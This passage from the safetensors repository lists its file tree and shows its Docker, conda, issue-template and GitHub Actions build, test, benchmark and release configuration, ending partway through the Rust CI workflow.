├── .dockerignore ├── .github ├── ISSUE_TEMPLATE │ ├── bug-report.yml │ ├── config.yml │ └── feature-request.yml ├── PULL_REQUEST_TEMPLATE.md ├── conda │ ├── bld.bat │ ├── build.sh │ └── meta.yaml ├── stale.yml └── workflows │ ├── build_documentation.yml │ ├── build_pr_documentation.yml │ ├── codecov.yml │ ├── delete_doc_comment.yml │ ├── delete_doc_comment_trigger.yml │ ├── python-bench.yml │ ├── python-release-conda.yml │ ├── python-release.yml │ ├── python.yml │ ├── rust-release.yml │ ├── rust.yml │ ├── stale.yml │ ├── trufflehog.yml │ └── upload_pr_documentation.yml ├── .gitignore ├── .pre-commit-config.yaml ├── Dockerfile.s390x.test ├── LICENSE ├── Makefile ├── README.md ├── RELEASE.md ├── attacks ├── README.md ├── numpy_dos_create.py ├── numpy_dos_get_pwned.py ├── paddle_ace_create.py ├── paddle_ace_get_pwned.py ├── safetensors_abuse_attempt_1.py ├── safetensors_abuse_attempt_2.py ├── safetensors_abuse_attempt_3.py ├── tf_ace_create.py ├── tf_ace_get_pwned.py ├── tf_safe_ace_create.py ├── tf_safe_ace_get_pwned.py ├── torch_ace_create.py ├── torch_ace_get_pwned.py ├── torch_dos_create.py └── torch_dos_get_pwned.py ├── bindings └── python │ ├── .gitignore │ ├── Cargo.toml │ ├── LICENSE │ ├── MANIFEST.in │ ├── Makefile │ ├── README.md │ ├── benches │ ├── test_flax.py │ ├── test_mlx.py │ ├── test_paddle.py │ ├── test_pt.py │ └── test_tf.py │ ├── convert.py │ ├── convert_all.py │ ├── fuzz.py │ ├── py_src │ └── safetensors │ │ ├── __init__.py │ │ ├── __init__.pyi │ │ ├── flax.py │ │ ├── mlx.py │ │ ├── numpy.py │ │ ├── paddle.py │ │ ├── py.typed │ │ ├── tensorflow.py │ │ └── torch.py │ ├── pyproject.toml │ ├── setup.cfg │ ├── src │ └── lib.rs │ ├── stub.py │ ├── tests │ ├── data │ │ └── __init__.py │ ├── test_flax_comparison.py │ ├── test_mlx_comparison.py │ ├── test_paddle_comparison.py │ ├── test_pt_comparison.py │ ├── test_pt_model.py │ ├── test_simple.py │ └── test_tf_comparison.py │ └── uv.lock ├── codecov.yaml ├── codecov.yml ├── docs ├── safetensors.schema.json └── source │ ├── _toctree.yml │ ├── api │ ├── flax.mdx │ ├── numpy.mdx │ ├── paddle.mdx │ ├── tensorflow.mdx │ └── torch.mdx │ ├── convert-weights.md │ ├── index.mdx │ ├── metadata_parsing.mdx │ ├── speed.mdx │ └── torch_shared_tensors.mdx ├── flake.lock ├── flake.nix └── safetensors ├── Cargo.toml ├── LICENSE ├── README.md ├── benches └── benchmark.rs ├── fuzz ├── .gitignore ├── Cargo.toml └── fuzz_targets │ └── fuzz_target_1.rs └── src ├── lib.rs ├── slice.rs └── tensor.rs /.dockerignore: -------------------------------------------------------------------------------- 1 | safetensors/target 2 | bindings/python/target 3 | Dockerfile.s390x.test 4 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug-report.yml: -------------------------------------------------------------------------------- 1 | name: "\U0001F41B Bug Report" 2 | description: Submit a bug report to help us improve safetensors 3 | body: 4 | - type: textarea 5 | id: system-info 6 | attributes: 7 | label: System Info 8 | description: Please share your system info with us. You can run the command `transformers-cli env` and copy-paste its output below. 9 | placeholder: safetensors version, platform, python version, ... 10 | validations: 11 | required: true 12 | 13 | # - type: textarea 14 | # id: who-can-help 15 | # attributes: 16 | # label: Who can help? 
17 | # description: | 18 | # Your issue will be replied to more quickly if you can figure out the right person to tag with @ 19 | # If you know how to use git blame, that is the easiest way, otherwise, here is a rough guide of **who to tag**. 20 | # 21 | # All issues are read by one of the core maintainers, so if you don't know who to tag, just leave this blank and 22 | # a core maintainer will ping the right person. 23 | # 24 | # Please tag fewer than 3 people. 25 | # 26 | # Models: 27 | 28 | # - text models: @ArthurZucker and @younesbelkada 29 | # - vision models: @amyeroberts 30 | # - speech models: @sanchit-gandhi 31 | # - graph models: @clefourrier 32 | # 33 | # Library: 34 | # 35 | # - flax: @sanchit-gandhi 36 | # - generate: @gante 37 | # - pipelines: @Narsil 38 | # - tensorflow: @gante and @Rocketknight1 39 | # - tokenizers: @ArthurZucker 40 | # - trainer: @sgugger 41 | # 42 | # Integrations: 43 | # 44 | # - deepspeed: HF Trainer: @stas00, Accelerate: @pacman100 45 | # - ray/raytune: @richardliaw, @amogkam 46 | # - Big Model Inference: @sgugger @muellerzr 47 | # 48 | # Documentation: @sgugger, @stevhliu and @MKhalusova 49 | # 50 | # Model hub: 51 | 52 | # - for issues with a model, report at https://discuss.huggingface.co/ and tag the model's creator. 53 | # 54 | # HF projects: 55 | # 56 | # - accelerate: [different repo](https://github.com/huggingface/accelerate) 57 | # - datasets: [different repo](https://github.com/huggingface/datasets) 58 | # - diffusers: [different repo](https://github.com/huggingface/diffusers) 59 | # - rust tokenizers: [different repo](https://github.com/huggingface/tokenizers) 60 | # 61 | # Maintained examples (not research project or legacy): 62 | # 63 | # - Flax: @sanchit-gandhi 64 | # - PyTorch: @sgugger 65 | # - TensorFlow: @Rocketknight1 66 | 67 | # Research projects are not maintained and should be taken as is. 68 | 69 | # placeholder: "@Username ..." 70 | 71 | - type: checkboxes 72 | id: information-scripts-examples 73 | attributes: 74 | label: Information 75 | description: 'The problem arises when using:' 76 | options: 77 | - label: "The official example scripts" 78 | - label: "My own modified scripts" 79 | 80 | - type: textarea 81 | id: reproduction 82 | validations: 83 | required: true 84 | attributes: 85 | label: Reproduction 86 | description: | 87 | Please provide a code sample that reproduces the problem you ran into. It can be a Colab link or just a code snippet. 88 | If you have code snippets, error messages, stack traces please provide them here as well. 89 | Important! Use code tags to correctly format your code. See https://help.github.com/en/github/writing-on-github/creating-and-highlighting-code-blocks#syntax-highlighting 90 | Do not use screenshots, as they are hard to read and (more importantly) don't allow others to copy-and-paste your code. 91 | 92 | placeholder: | 93 | Steps to reproduce the behavior: 94 | 95 | 1. 96 | 2. 97 | 3. 98 | 99 | 100 | - type: textarea 101 | id: expected-behavior 102 | validations: 103 | required: true 104 | attributes: 105 | label: Expected behavior 106 | description: "A clear and concise description of what you would expect to happen." 
107 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/config.yml: -------------------------------------------------------------------------------- 1 | blank_issues_enabled: true 2 | version: 2.1 3 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature-request.yml: -------------------------------------------------------------------------------- 1 | name: "\U0001F680 Feature request" 2 | description: Submit a proposal/request for a new safetensors feature 3 | labels: [ "feature" ] 4 | body: 5 | - type: textarea 6 | id: feature-request 7 | validations: 8 | required: true 9 | attributes: 10 | label: Feature request 11 | description: | 12 | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist. 13 | 14 | - type: textarea 15 | id: motivation 16 | validations: 17 | required: true 18 | attributes: 19 | label: Motivation 20 | description: | 21 | Please outline the motivation for the proposal. Is your feature request related to a problem? e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too. 22 | 23 | 24 | - type: textarea 25 | id: contribution 26 | validations: 27 | required: true 28 | attributes: 29 | label: Your contribution 30 | description: | 31 | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the CONTRIBUTING.MD [readme](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md) 32 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # What does this PR do? 2 | 3 | 12 | 13 | 14 | 15 | Fixes # (issue) or description of the problem this PR solves. 16 | -------------------------------------------------------------------------------- /.github/conda/bld.bat: -------------------------------------------------------------------------------- 1 | cd bindings\python 2 | %PYTHON% -m pip install . --prefix=%PREFIX% 3 | -------------------------------------------------------------------------------- /.github/conda/build.sh: -------------------------------------------------------------------------------- 1 | cd bindings/python 2 | $PYTHON -m pip install . 
--prefix=$PREFIX 3 | -------------------------------------------------------------------------------- /.github/conda/meta.yaml: -------------------------------------------------------------------------------- 1 | {% set name = "safetensors" %} 2 | 3 | package: 4 | name: "{{ name|lower }}" 5 | version: "{{ SAFETENSORS_VERSION }}" 6 | 7 | source: 8 | path: ../../ 9 | 10 | requirements: 11 | host: 12 | - pip 13 | - python x.x 14 | - setuptools 15 | - setuptools-rust 16 | - maturin 17 | 18 | run: 19 | - python x.x 20 | 21 | test: 22 | imports: 23 | - safetensors 24 | 25 | about: 26 | home: https://huggingface.co/docs/safetensors 27 | license: Apache License 2.0 28 | license_file: LICENSE 29 | summary: "Safe and portable way of storing tensors" 30 | -------------------------------------------------------------------------------- /.github/stale.yml: -------------------------------------------------------------------------------- 1 | # Number of days of inactivity before an issue becomes stale 2 | daysUntilStale: 60 3 | # Number of days of inactivity before a stale issue is closed 4 | daysUntilClose: 7 5 | # Issues with these labels will never be considered stale 6 | exemptLabels: 7 | - pinned 8 | - security 9 | # Label to use when marking an issue as stale 10 | staleLabel: wontfix 11 | # Comment to post when marking an issue as stale. Set to `false` to disable 12 | markComment: > 13 | This issue has been automatically marked as stale because it has not had 14 | recent activity. It will be closed if no further activity occurs. Thank you 15 | for your contributions. 16 | # Comment to post when closing a stale issue. Set to `false` to disable 17 | closeComment: false 18 | -------------------------------------------------------------------------------- /.github/workflows/build_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Build documentation 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | - doc-builder* 8 | - v*-release 9 | - use_templates 10 | 11 | jobs: 12 | build: 13 | uses: huggingface/doc-builder/.github/workflows/build_main_documentation.yml@main 14 | with: 15 | commit_sha: ${{ github.sha }} 16 | package: safetensors 17 | notebook_folder: safetensors_doc 18 | package_path: safetensors/bindings/python/ 19 | version_tag_suffix: bindings/python/py_src/ 20 | install_rust: true 21 | custom_container: huggingface/transformers-doc-builder 22 | secrets: 23 | token: ${{ secrets.HUGGINGFACE_PUSH }} 24 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} 25 | -------------------------------------------------------------------------------- /.github/workflows/build_pr_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Build PR Documentation 2 | 3 | on: 4 | pull_request: 5 | paths: 6 | - "docs/**" 7 | - "bindings/python/py_src/**" 8 | - ".github/workflows/build_pr_documentation.yml" 9 | 10 | concurrency: 11 | group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }} 12 | cancel-in-progress: true 13 | 14 | jobs: 15 | build: 16 | uses: huggingface/doc-builder/.github/workflows/build_pr_documentation.yml@main 17 | with: 18 | commit_sha: ${{ github.event.pull_request.head.sha }} 19 | pr_number: ${{ github.event.number }} 20 | package: safetensors 21 | package_path: safetensors/bindings/python/ 22 | version_tag_suffix: bindings/python/py_src/ 23 | install_rust: true 24 | custom_container: huggingface/transformers-doc-builder 25 | 
-------------------------------------------------------------------------------- /.github/workflows/codecov.yml: -------------------------------------------------------------------------------- 1 | name: Code coverage 2 | on: 3 | push: 4 | branches: 5 | - main 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | defaults: 11 | run: 12 | working-directory: ./safetensors 13 | 14 | steps: 15 | - uses: actions/checkout@v3 16 | 17 | - name: Install Rust Stable 18 | uses: actions-rs/toolchain@v1 19 | with: 20 | toolchain: stable 21 | components: llvm-tools-preview 22 | override: true 23 | 24 | - uses: Swatinem/rust-cache@v2 25 | 26 | - name: Install cargo-llvm-cov for Ubuntu 27 | run: cargo install cargo-llvm-cov 28 | 29 | - name: Coverage report 30 | run: cargo llvm-cov --release --lcov --output-path lcov.info 31 | 32 | - name: Upload to codecov.io 33 | uses: codecov/codecov-action@v3 34 | with: 35 | token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos 36 | working-directory: ./safetensors 37 | fail_ci_if_error: true 38 | -------------------------------------------------------------------------------- /.github/workflows/delete_doc_comment.yml: -------------------------------------------------------------------------------- 1 | name: Delete doc comment 2 | 3 | on: 4 | workflow_run: 5 | workflows: ["Delete doc comment trigger"] 6 | types: 7 | - completed 8 | 9 | jobs: 10 | delete: 11 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main 12 | secrets: 13 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }} -------------------------------------------------------------------------------- /.github/workflows/delete_doc_comment_trigger.yml: -------------------------------------------------------------------------------- 1 | name: Delete doc comment trigger 2 | 3 | on: 4 | pull_request: 5 | types: [ closed ] 6 | 7 | jobs: 8 | delete: 9 | uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main 10 | with: 11 | pr_number: ${{ github.event.number }} -------------------------------------------------------------------------------- /.github/workflows/python-bench.yml: -------------------------------------------------------------------------------- 1 | name: Simple benchmarks 2 | on: 3 | push: 4 | branches: 5 | - main 6 | pull_request: 7 | 8 | 9 | permissions: 10 | # deployments permission to deploy GitHub pages website 11 | deployments: write 12 | # contents permission to update benchmark contents in gh-pages branch 13 | contents: write 14 | 15 | jobs: 16 | benchmark: 17 | name: Performance regression check 18 | runs-on: ubuntu-latest 19 | steps: 20 | - uses: actions/checkout@v4 21 | - name: Install Rust 22 | uses: actions-rs/toolchain@v1 23 | with: 24 | toolchain: stable 25 | components: rustfmt, clippy 26 | 27 | - name: Install Python 28 | uses: actions/setup-python@v4 29 | with: 30 | python-version: "3.12" 31 | architecture: "x64" 32 | 33 | - name: Install 34 | working-directory: ./bindings/python 35 | run: | 36 | pip install -U pip uv 37 | uv sync --extra dev 38 | 39 | - name: Run tests 40 | working-directory: ./bindings/python 41 | run: | 42 | cargo test 43 | uv run pytest --benchmark-json output.json benches/ 44 | # Download previous benchmark result from cache (if exists) 45 | - name: Download previous benchmark data 46 | uses: actions/cache@v4 47 | with: 48 | path: ./cache 49 | key: ${{ runner.os }}-benchmark 50 | # Run `github-action-benchmark` action 51 | - name: Store benchmark result 52 | uses: 
benchmark-action/github-action-benchmark@v1 53 | with: 54 | # What benchmark tool the output.txt came from 55 | tool: 'pytest' 56 | # Where the output from the benchmark tool is stored 57 | output-file-path: ./bindings/python/output.json 58 | github-token: ${{ secrets.GITHUB_TOKEN }} 59 | # Push and deploy GitHub pages branch automatically 60 | auto-push: true 61 | comment-on-alert: true 62 | # Mention @rhysd in the commit comment 63 | alert-comment-cc-users: '@Narsil' 64 | -------------------------------------------------------------------------------- /.github/workflows/python-release-conda.yml: -------------------------------------------------------------------------------- 1 | name: Python Release - Conda 2 | 3 | on: 4 | push: 5 | tags: 6 | - v* 7 | 8 | env: 9 | ANACONDA_API_TOKEN: ${{ secrets.ANACONDA_API_TOKEN }} 10 | 11 | jobs: 12 | build_and_package: 13 | runs-on: ${{ matrix.os }} 14 | strategy: 15 | matrix: 16 | os: [windows-latest, macos-latest] 17 | # 3.11 not available on Conda yet. 18 | python: ["3.8", "3.9", "3.10", "3.11"] 19 | 20 | steps: 21 | - name: Checkout repository 22 | uses: actions/checkout@v3 23 | 24 | - name: Install miniconda 25 | uses: conda-incubator/setup-miniconda@v2 26 | with: 27 | auto-update-conda: true 28 | python-version: ${{ matrix.python }} 29 | 30 | - name: Conda info 31 | shell: bash -l {0} 32 | run: conda info 33 | 34 | - name: Install Rust 35 | uses: actions-rs/toolchain@v1 36 | with: 37 | toolchain: stable 38 | 39 | - name: Setup conda env 40 | shell: bash -l {0} 41 | run: | 42 | conda install setuptools-rust 43 | conda install -c defaults anaconda-client conda-build 44 | 45 | - name: Extract version 46 | shell: bash -l {0} 47 | working-directory: ./bindings/python 48 | run: echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV 49 | 50 | - name: Build conda packages 51 | shell: bash -l {0} 52 | run: | 53 | conda info 54 | conda list 55 | conda-build .github/conda --python=${{ matrix.python }} 56 | 57 | - name: Upload to Anaconda 58 | shell: bash -l {0} 59 | run: | 60 | anaconda upload `conda-build .github/conda --output` --force 61 | 62 | build_and_package_linux: 63 | runs-on: ubuntu-latest 64 | container: quay.io/pypa/manylinux2014_x86_64 65 | 66 | strategy: 67 | fail-fast: false 68 | matrix: 69 | python: [38, 39, 310, 311] 70 | include: 71 | - python: 38 72 | checksum: e2a4438671e0e42c5bba14cb51de6ce9763938184d6ca2967340bbe972bbe7e6 73 | - python: 39 74 | checksum: 9829d95f639bd0053b2ed06d1204e60644617bf37dd5cc57523732e0e8d64516 75 | - python: 310 76 | checksum: ea5e6e8a3d5a0247b9df85382d27220fac8e59b5778fd313c5913879cd9baafc 77 | - python: 311 78 | checksum: 634d76df5e489c44ade4085552b97bebc786d49245ed1a830022b0b406de5817 79 | 80 | steps: 81 | - name: Checkout repository 82 | uses: actions/checkout@v2 83 | 84 | - name: Install miniconda 85 | run: | 86 | yum install -y wget openssl-devel 87 | export FILENAME=Miniconda3-py${{ matrix.python }}_23.5.2-0-Linux-x86_64.sh 88 | wget https://repo.anaconda.com/miniconda/$FILENAME 89 | sha256sum $FILENAME | awk '$1=="${{ matrix.checksum}}"{print"good to go"}' 90 | bash $FILENAME -b -p $HOME/miniconda 91 | source $HOME/miniconda/bin/activate 92 | 93 | - name: Show glibc information 94 | shell: bash -l {0} 95 | run: ldd --version 96 | 97 | - name: Conda info 98 | shell: bash -l {0} 99 | run: | 100 | source $HOME/miniconda/bin/activate 101 | conda info 102 | 103 | - name: Install Rust 104 | uses: actions-rs/toolchain@v1 105 | with: 106 | 
toolchain: stable 107 | 108 | - name: Setup conda env 109 | shell: bash -l {0} 110 | run: | 111 | source $HOME/miniconda/bin/activate 112 | conda install setuptools-rust 113 | conda install -c defaults anaconda-client conda-build 114 | 115 | - name: Extract version 116 | shell: bash -l {0} 117 | working-directory: ./bindings/python 118 | run: | 119 | source $HOME/miniconda/bin/activate 120 | echo "SAFETENSORS_VERSION=`grep -m 1 version Cargo.toml | grep -e '".*"' -o | tr -d '"' | sed s/-/./ `" >> $GITHUB_ENV 121 | 122 | - name: Build conda packages 123 | shell: bash -l {0} 124 | run: | 125 | source $HOME/miniconda/bin/activate 126 | conda info 127 | conda list 128 | conda-build .github/conda --python=${{ matrix.python }} 129 | 130 | - name: Upload to Anaconda 131 | shell: bash -l {0} 132 | run: | 133 | source $HOME/miniconda/bin/activate 134 | anaconda upload `conda-build .github/conda --output` --force 135 | -------------------------------------------------------------------------------- /.github/workflows/python-release.yml: -------------------------------------------------------------------------------- 1 | # This file is autogenerated by maturin v1.7.4 2 | # To update, run 3 | # 4 | # maturin generate-ci github -m bindings/python/Cargo.toml 5 | # 6 | name: CI 7 | 8 | on: 9 | push: 10 | branches: 11 | - main 12 | - master 13 | tags: 14 | - '*' 15 | pull_request: 16 | workflow_dispatch: 17 | 18 | permissions: 19 | contents: read 20 | 21 | jobs: 22 | linux: 23 | runs-on: ${{ matrix.platform.runner }} 24 | strategy: 25 | matrix: 26 | platform: 27 | - runner: ubuntu-latest 28 | target: x86_64 29 | - runner: ubuntu-latest 30 | target: x86 31 | - runner: ubuntu-latest 32 | target: aarch64 33 | - runner: ubuntu-latest 34 | target: armv7 35 | - runner: ubuntu-latest 36 | target: s390x 37 | - runner: ubuntu-latest 38 | target: ppc64le 39 | steps: 40 | - uses: actions/checkout@v4 41 | - uses: actions/setup-python@v5 42 | with: 43 | python-version: 3.x 44 | - name: Build wheels 45 | uses: PyO3/maturin-action@v1 46 | with: 47 | target: ${{ matrix.platform.target }} 48 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 49 | sccache: 'true' 50 | manylinux: auto 51 | - name: Upload wheels 52 | uses: actions/upload-artifact@v4 53 | with: 54 | name: wheels-linux-${{ matrix.platform.target }} 55 | path: dist 56 | 57 | musllinux: 58 | runs-on: ${{ matrix.platform.runner }} 59 | strategy: 60 | matrix: 61 | platform: 62 | - runner: ubuntu-latest 63 | target: x86_64 64 | - runner: ubuntu-latest 65 | target: x86 66 | - runner: ubuntu-latest 67 | target: aarch64 68 | - runner: ubuntu-latest 69 | target: armv7 70 | steps: 71 | - uses: actions/checkout@v4 72 | - uses: actions/setup-python@v5 73 | with: 74 | python-version: 3.x 75 | - name: Build wheels 76 | uses: PyO3/maturin-action@v1 77 | with: 78 | target: ${{ matrix.platform.target }} 79 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 80 | sccache: 'true' 81 | manylinux: musllinux_1_2 82 | - name: Upload wheels 83 | uses: actions/upload-artifact@v4 84 | with: 85 | name: wheels-musllinux-${{ matrix.platform.target }} 86 | path: dist 87 | 88 | windows: 89 | runs-on: ${{ matrix.platform.runner }} 90 | strategy: 91 | matrix: 92 | platform: 93 | - runner: windows-latest 94 | target: x64 95 | - runner: windows-latest 96 | target: x86 97 | steps: 98 | - uses: actions/checkout@v4 99 | - uses: actions/setup-python@v5 100 | with: 101 | python-version: 3.x 102 | architecture: ${{ matrix.platform.target }} 103 | - name: Build 
wheels 104 | uses: PyO3/maturin-action@v1 105 | with: 106 | target: ${{ matrix.platform.target }} 107 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 108 | sccache: 'true' 109 | - name: Upload wheels 110 | uses: actions/upload-artifact@v4 111 | with: 112 | name: wheels-windows-${{ matrix.platform.target }} 113 | path: dist 114 | 115 | macos: 116 | runs-on: ${{ matrix.platform.runner }} 117 | strategy: 118 | matrix: 119 | platform: 120 | - runner: macos-13 121 | target: x86_64 122 | - runner: macos-14 123 | target: aarch64 124 | steps: 125 | - uses: actions/checkout@v4 126 | - uses: actions/setup-python@v5 127 | with: 128 | python-version: 3.x 129 | - name: Build wheels 130 | uses: PyO3/maturin-action@v1 131 | with: 132 | target: ${{ matrix.platform.target }} 133 | args: --release --out dist --manifest-path bindings/python/Cargo.toml 134 | sccache: 'true' 135 | - name: Upload wheels 136 | uses: actions/upload-artifact@v4 137 | with: 138 | name: wheels-macos-${{ matrix.platform.target }} 139 | path: dist 140 | 141 | sdist: 142 | runs-on: ubuntu-latest 143 | steps: 144 | - uses: actions/checkout@v4 145 | - name: Build sdist 146 | uses: PyO3/maturin-action@v1 147 | with: 148 | command: sdist 149 | args: --out dist --manifest-path bindings/python/Cargo.toml 150 | - name: Upload sdist 151 | uses: actions/upload-artifact@v4 152 | with: 153 | name: wheels-sdist 154 | path: dist 155 | 156 | release: 157 | name: Release 158 | runs-on: ubuntu-latest 159 | if: ${{ startsWith(github.ref, 'refs/tags/') || github.event_name == 'workflow_dispatch' }} 160 | needs: [linux, musllinux, windows, macos, sdist] 161 | permissions: 162 | # Use to sign the release artifacts 163 | id-token: write 164 | # Used to upload release artifacts 165 | contents: write 166 | # Used to generate artifact attestation 167 | attestations: write 168 | steps: 169 | - uses: actions/download-artifact@v4 170 | - name: Generate artifact attestation 171 | uses: actions/attest-build-provenance@v1 172 | with: 173 | subject-path: 'wheels-*/*' 174 | - name: Publish to PyPI 175 | if: "startsWith(github.ref, 'refs/tags/')" 176 | uses: PyO3/maturin-action@v1 177 | env: 178 | MATURIN_PYPI_TOKEN: ${{ secrets.PYPI_TOKEN_DIST}} 179 | with: 180 | command: upload 181 | args: --non-interactive --skip-existing wheels-*/* 182 | -------------------------------------------------------------------------------- /.github/workflows/python.yml: -------------------------------------------------------------------------------- 1 | name: Python 2 | 3 | on: 4 | pull_request: 5 | 6 | jobs: 7 | build_and_test: 8 | name: Check everything builds & tests 9 | runs-on: ${{ matrix.os }} 10 | strategy: 11 | matrix: 12 | os: [ubuntu-latest, macos-13, windows-latest] 13 | # Lowest and highest, no version specified so that 14 | # new releases get automatically tested against 15 | version: [{torch: torch==1.10, python: "3.9", arch: "x64"}, {torch: torch, python: "3.12", arch: "x64"}] 16 | # TODO this would include macos ARM target. 17 | # however jax has an illegal instruction issue 18 | # that exists only in CI (probably difference in instruction support). 
 19 |         # include: 
 20 |         #   - os: macos-latest 
 21 |         #     version: 
 22 |         #       torch: torch 
 23 |         #       python: "3.11" 
 24 |         include: 
 25 |           - os: ubuntu-latest 
 26 |             version: 
 27 |               torch: torch 
 28 |               python: "3.13" 
 29 |               arch: "x64-freethreaded" 
 30 |     defaults: 
 31 |       run: 
 32 |         working-directory: ./bindings/python 
 33 |     steps: 
 34 |       - name: Checkout repository 
 35 |         uses: actions/checkout@v3 
 36 | 
 37 | 
 38 |       - name: Install Rust 
 39 |         uses: actions-rs/toolchain@v1 
 40 |         with: 
 41 |           toolchain: stable 
 42 |           components: rustfmt, clippy 
 43 | 
 44 |       - name: Cargo install audit 
 45 |         run: cargo install cargo-audit 
 46 | 
 47 |       - uses: Swatinem/rust-cache@v2 
 48 |         with: 
 49 |           workspaces: "bindings/python" 
 50 | 
 51 |       - name: Install Python 
 52 |         uses: actions/setup-python@v5 
 53 |         with: 
 54 |           python-version: ${{ matrix.version.python }} 
 55 |           architecture: ${{ matrix.version.arch }} 
 56 | 
 57 |       - name: Lint with RustFmt 
 58 |         run: cargo fmt -- --check 
 59 | 
 60 |       - name: Lint with Clippy 
 61 |         run: cargo clippy --all-targets --all-features -- -D warnings 
 62 | 
 63 |       - name: Run Audit 
 64 |         run: cargo audit -D warnings 
 65 | 
 66 |       - name: Install 
 67 |         run: | 
 68 |           pip install -U pip 
 69 |           pip install .[numpy] 
 70 | 
 71 |       - name: Install (torch) 
 72 |         if: matrix.version.arch != 'x64-freethreaded' 
 73 |         run: | 
 74 |           pip install ${{ matrix.version.torch }} 
 75 |         shell: bash 
 76 | 
 77 |       - name: Install (torch freethreaded) 
 78 |         if: matrix.version.arch == 'x64-freethreaded' 
 79 |         run: | 
 80 |           pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cu126 
 81 |         shell: bash 
 82 | 
 83 |       - name: Install (tensorflow) 
 84 |         if: matrix.version.arch != 'x64-freethreaded' 
 85 |         run: | 
 86 |           pip install .[tensorflow] 
 87 |         shell: bash 
 88 | 
 89 |       - name: Install (jax, flax) 
 90 |         if: matrix.os != 'windows-latest' && matrix.version.arch != 'x64-freethreaded' 
 91 |         run: 
 92 |           pip install .[jax] 
 93 |         shell: bash 
 94 | 
 95 |       - name: Install (mlx) 
 96 |         if: matrix.os == 'macos-latest' 
 97 |         run: | 
 98 |           pip install .[mlx] 
 99 |         shell: bash 
100 | 
101 |       - name: Check style 
102 |         run: | 
103 |           pip install .[quality] 
104 |           black --check --line-length 119 --target-version py35 py_src/safetensors tests 
105 | 
106 |       - name: Run tests 
107 |         run: | 
108 |           cargo test 
109 |           pip install .[testing] 
110 |           pytest -sv tests/ 
111 | 
112 |   test_s390x_big_endian: 
113 |     runs-on: ubuntu-latest 
114 |     permissions: 
115 |       contents: write 
116 |       packages: write 
117 |     name: Test bigendian - S390X 
118 |     steps: 
119 |       - uses: actions/checkout@v2 
120 |       - name: Set up QEMU 
121 |         uses: docker/setup-qemu-action@v2 
122 |       - name: Set up Docker Buildx 
123 |         uses: docker/setup-buildx-action@v2 
124 |       - name: Set short sha 
125 |         id: vars 
126 |         run: echo "GITHUB_SHA_SHORT=$(git rev-parse --short HEAD)" >> $GITHUB_ENV 
127 |       - name: Docker meta 
128 |         id: meta 
129 |         uses: docker/metadata-action@v4 
130 |         with: 
131 |           # list of Docker images to use as base name for tags 
132 |           images: | 
133 |             ghcr.io/huggingface/safetensors/s390x 
134 |           # generate Docker tags based on the following events/attributes 
135 |           tags: | 
136 |             type=schedule 
137 |             type=ref,event=branch 
138 |             type=ref,event=pr 
139 |             type=semver,pattern={{version}} 
140 |             type=semver,pattern={{major}}.{{minor}} 
141 |             type=semver,pattern={{major}} 
142 |             type=sha 
143 |       - name: Login to Registry 
144 |         uses: docker/login-action@v3 
145 |         with: 
146 |           registry: ghcr.io 
147 |           username: ${{ github.actor }} 
148 |           password: ${{ secrets.GITHUB_TOKEN }} 
149 |       - name: Test big endian 
150 |         uses: docker/build-push-action@v4 
151 |         with: 
152 |           platforms: linux/s390x 
153 |           file: 
Dockerfile.s390x.test 154 | tags: ${{ steps.meta.outputs.tags }} 155 | labels: ${{ steps.meta.outputs.labels }} 156 | cache-from: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max 157 | cache-to: type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max 158 | -------------------------------------------------------------------------------- /.github/workflows/rust-release.yml: -------------------------------------------------------------------------------- 1 | name: Rust Release 2 | 3 | env: 4 | CRATES_TOKEN: ${{ secrets.CRATES_TOKEN }} 5 | 6 | on: 7 | push: 8 | tags: 9 | - v* 10 | 11 | jobs: 12 | rust_publish: 13 | runs-on: ubuntu-latest 14 | steps: 15 | - name: Checkout repository 16 | uses: actions/checkout@v3 17 | 18 | - name: Install Rust 19 | uses: actions-rs/toolchain@v1 20 | with: 21 | toolchain: stable 22 | 23 | - name: Cache Cargo Registry 24 | uses: actions/cache@v1 25 | with: 26 | path: ~/.cargo/registry 27 | key: ubuntu-latest-cargo-registry-${{ hashFiles('**/Cargo.toml') }} 28 | 29 | - name: Publish package rust 30 | if: ${{ !contains(github.ref, 'rc') }} 31 | working-directory: ./safetensors 32 | run: cargo publish --token ${CRATES_TOKEN} 33 | 34 | -------------------------------------------------------------------------------- /.github/workflows/rust.yml: -------------------------------------------------------------------------------- 1 | name: Rust 2 | 3 | on: 4 | pull_request: 5 | 6 | jobs: 7 | build: 8 | runs-on: ${{ matrix.os }} 9 | strategy: 10 | matrix: 11 | os: [ubuntu-latest, windows-latest, macOS-latest] 12 | toolchain: [stable] 13 | include: 14 | - os: ubuntu-latest 15 | toolchain: "1.74" 16 | defaults: 17 | run: 18 | working-directory: ./safetensors 19 | 20 | steps: 21 | - uses: actions/checkout@v3 22 | 23 | - name: Install Rust Stable 24 | uses: actions-rs/toolchain@v1 25 | with: 26 | toolchain: stable 27 | components: rustfmt, clippy, llvm-tools-preview 28 | override: true 29 | 30 | - uses: Swatinem/rust-cache@v2 31 | 32 | - name: Install cargo-audit 33 | run: cargo install cargo-audit 34 | 35 | - name: 